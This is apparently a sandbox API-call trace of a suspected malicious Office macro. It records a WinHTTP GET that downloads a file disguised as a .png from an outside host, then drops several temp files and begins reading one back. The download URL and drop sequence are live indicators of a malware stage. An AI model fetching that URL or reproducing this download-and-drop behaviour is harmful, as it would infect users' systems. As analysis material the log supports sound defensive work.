[0212.672] SetErrorMode (uMode=0x8001) returned 0x8001
[0212.672] GetProcAddress (hModule=0x77780000, lpProcName="FindWindowA") returned 0x777a8270
[0212.672] FindWindowA (lpClassName="msprotB7", lpWindowName=0x0) returned 0x0
[0212.673] GetLastError () returned 0x0
[0212.674] CLSIDFromProgIDEx (in: lpszProgID="WinHTTP.WinHTTPrequest.5", lpclsid=0x15db98 | out: lpclsid=0x15db98*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3
[0212.687] CreateBindCtx (in: reserved=0x0, ppbc=0x15dae8 | out: ppbc=0x15dae8*=0x6fae180) returned 0x0
[0212.688] MkParseDisplayName (in: pbc=0x6fae180, szUserName="WinHTTP.WinHTTPrequest.5", pchEaten=0x15dae4, ppmk=0x15daf0 | out: pchEaten=0x15dae4, ppmk=0x15daf0*=0x0) returned 0x800401e4
[0212.698] IUnknown:Release (This=0x6fae180) returned 0x0
[0212.699] RtlUnwindEx (TargetFrame=0x15dd30, TargetIp=0x7fef41d493d, ExceptionRecord=0x0, ReturnValue=0x15de40, ContextRecord=0x15d580, HistoryTable=0x0)
[0212.723] CLSIDFromProgIDEx (in: lpszProgID="WinHTTP.WinHTTPrequest.5.1", lpclsid=0x15db98 | out: lpclsid=0x15db98*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0
[0212.738] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0212.738] CoCreateInstance (in: rclsid=0x15db98*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7fef447aa48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x15db48 | out: ppv=0x15db48*=0x7052000) returned 0x0
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef4494590*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x15db60 | out: ppvObject=0x15db60*=0x0) returned 0x80004002
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef44945a0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x15db68 | out: ppvObject=0x15db68*=0x0) returned 0x80004002
[0212.750] WinHttpRequest:IUnknown:QueryInterface (in: This=0x7052000, riid=0x7fef447aa68*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x15dc28 | out: ppvObject=0x15dc28*=0x7052000) returned 0x0
[0212.750] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x1
[0212.751] WinHttpRequest:IUnknown:AddRef (This=0x7052000) returned 0x2
[0212.751] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x1
[0212.753] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="Open", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=1) returned 0x0
[0212.755] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=1, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x15dcc8*(rgvarg=([0]=0x1086edb0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1086edc8*(varType=0x4008, wReserved1=0x1047, wReserved2=0x0, wReserved3=0x0, varVal1=0x1086efb0*="https://picstate.com/file/20260941_ugxbx/B7CHZ11.png", varVal2=0x1086efb0), [2]=0x1086ede0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=([0]=0x1086edb0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), [1]=0x1086edc8*(varType=0x4008, wReserved1=0x1047, wReserved2=0x0, wReserved3=0x0, varVal1=0x1086efb0*="https://picstate.com/file/20260941_ugxbx/B7CHZ11.png", varVal2=0x1086efb0), [2]=0x1086ede0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e56e0) returned 0x0
[0212.792] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="SetTimeout8s", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=0) returned 0x80020006
[0212.793] RtlUnwindEx (TargetFrame=0x15dd30, TargetIp=0x7fef41d493d, ExceptionRecord=0x0, ReturnValue=0x15de40, ContextRecord=0x15d6c0, HistoryTable=0x0)
[0212.793] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="Send", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=5) returned 0x0
[0212.794] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=5, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e56a8) returned 0x0
[0216.090] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x7052000, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x15dd30*="ResponseBody", cNames=0x1, lcid=0x409, rgDispId=0x15dd14 | out: rgDispId=0x15dd14*=10) returned 0x0
[0216.090] WinHttpRequest:IDispatch:Invoke (in: This=0x7052000, dispIdMember=10, riid=0x7fef447aa58*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1086ef90, pExcepInfo=0x15dce0, puArgErr=0x15dcc0 | out: pDispParams=0x15dcc8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x1086ef90*(varType=0x2011, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x12da79b0*(cDims=0x1, fFeatures=0x2080, cbElements=0x1, cLocks=0x0, pvData=0x12da79d0*, rgsabound=((cElements=0x36a79, lLbound=0))), varVal2=0x1050015dd30), pExcepInfo=0x15dce0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x15dcc0*=0xfa2e5630) returned 0x0
[0216.092] SafeArrayCopy (in: psa=0x12da79b0, ppsaOut=0x1086eec0 | out: ppsaOut=0x1086eec0) returned 0x0
[0216.094] WinHttpRequest:IUnknown:Release (This=0x7052000) returned 0x0
[0216.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.109] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.110] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.110] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x10e4e7c8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.110] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.110] CRetailMalloc_Free () returned 0xce1008570001
[0216.111] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", lpUsedDefaultChar=0x0) returned 46
[0216.112] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp"
[0216.112] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\zz11.tmp"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.117] CRetailMalloc_Alloc () returned 0x11178480
[0216.117] strcpy_s (in: _Dst=0x111784b9, _DstSize=0x2e, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned 0x0
[0216.149] _write (in: _FileHandle=3, _Buf=0x7458530*, _MaxCharCount=0x6e8 | out: _Buf=0x7458530*) returned 1768
[0216.157] _close (_FileHandle=3) returned 0
[0216.162] CRetailMalloc_Free () returned 0xb7ac54207f20001
[0216.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.162] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.162] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.162] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x10e4e8c8, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.163] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.163] CRetailMalloc_Free () returned 0xce1108570001
[0216.163] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", lpUsedDefaultChar=0x0) returned 45
[0216.163] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp"
[0216.163] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\ttt.tmp"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.166] CRetailMalloc_Alloc () returned 0x11178600
[0216.166] strcpy_s (in: _Dst=0x11178639, _DstSize=0x2d, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\TTT.tmp") returned 0x0
[0216.167] _write (in: _FileHandle=3, _Buf=0x13017a20*, _MaxCharCount=0x353fd | out: _Buf=0x13017a20*) returned 218109
[0216.183] _close (_FileHandle=3) returned 0
[0216.192] CRetailMalloc_Free () returned 0xb7ac54307e20001
[0216.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.192] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.192] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.192] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.193] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.193] CRetailMalloc_Free () returned 0xce1208570001
[0216.193] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", lpUsedDefaultChar=0x0) returned 49
[0216.193] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt"
[0216.193] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.txt"), _OpenFlag=33026, _ShareFlag=16, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.195] CRetailMalloc_Alloc () returned 0x11178600
[0216.195] strcpy_s (in: _Dst=0x11178639, _DstSize=0x31, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.txt") returned 0x0
[0216.196] _write (in: _FileHandle=3, _Buf=0x3692fe0*, _MaxCharCount=0xf32 | out: _Buf=0x3692fe0*) returned 3890
[0216.199] _close (_FileHandle=3) returned 0
[0216.200] CRetailMalloc_Free () returned 0xb7ac54407e20001
[0216.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.200] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.200] CRetailMalloc_Alloc () returned 0x6f12cb0
[0216.200] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x6f12cb0, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.201] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.201] CRetailMalloc_Free () returned 0xce1308570001
[0216.201] VarAdd (in: pvarLeft=0x1086ee78, pvarRight=0x1086ef58, pvarResult=0x1086ee60 | out: pvarResult=0x1086ee60) returned 0x0
[0216.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", cchWideChar=-1, lpMultiByteStr=0x15da40, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", lpUsedDefaultChar=0x0) returned 46
[0216.203] _fullpath (in: _FullPath=0x15dbd0, _Path="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp", _SizeInBytes=0x104 | out: _FullPath="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp"
[0216.204] _sopen_s (in: _FileHandle=0x15db80, _FileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\zz11.tmp"), _OpenFlag=32768, _ShareFlag=64, _PermissionMode=384 | out: _FileHandle=0x15db80*=3) returned 0x0
[0216.204] CRetailMalloc_Alloc () returned 0x107a2850
[0216.204] strcpy_s (in: _Dst=0x107a2a88, _DstSize=0x2e, _Src="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp" | out: _Dst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\ZZ11.tmp") returned 0x0
[0216.204] _lseek (_FileHandle=3, _Offset=0, _Origin=1) returned 0
[0216.205] _lseek (_FileHandle=3, _Offset=0, _Origin=2) returned 1768
[0216.205] _lseek (_FileHandle=3, _Offset=0, _Origin=0) returned 0
[0216.206] _read (in: _FileHandle=3, _DstBuf=0x107a2888, _MaxCharCount=0x200 | out: _DstBuf=0x107a2888*) returned 512
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dac8, cchWideChar=1 | out: lpWideCharStr="<ផ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="?", cbMultiByte=1, lpWideCharStr=0x369daca, cchWideChar=1 | out: lpWideCharStr="?") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x369dacc, cchWideChar=1 | out: lpWideCharStr="x") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369dace, cchWideChar=1 | out: lpWideCharStr="m\槚∃) returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x369dad0, cchWideChar=1 | out: lpWideCharStr="lͩ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dad2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x369dad4, cchWideChar=1 | out: lpWideCharStr="v") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dad6, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dad8, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dada, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dadc, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dade, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dae0, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369dae2, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369dae4, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dae6, cchWideChar=1 | out: lpWideCharStr="1\槚∃) returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369dae8, cchWideChar=1 | out: lpWideCharStr=".ͩ") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369daea, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369daec, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369daee, cchWideChar=1 | out: lpWideCharStr=" \槚∃) returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369daf0, cchWideChar=1 | out: lpWideCharStr="eͩ") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369daf2, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369daf4, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369daf6, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x369daf8, cchWideChar=1 | out: lpWideCharStr="d") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dafa, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dafc, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dafe, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db00, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db02, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
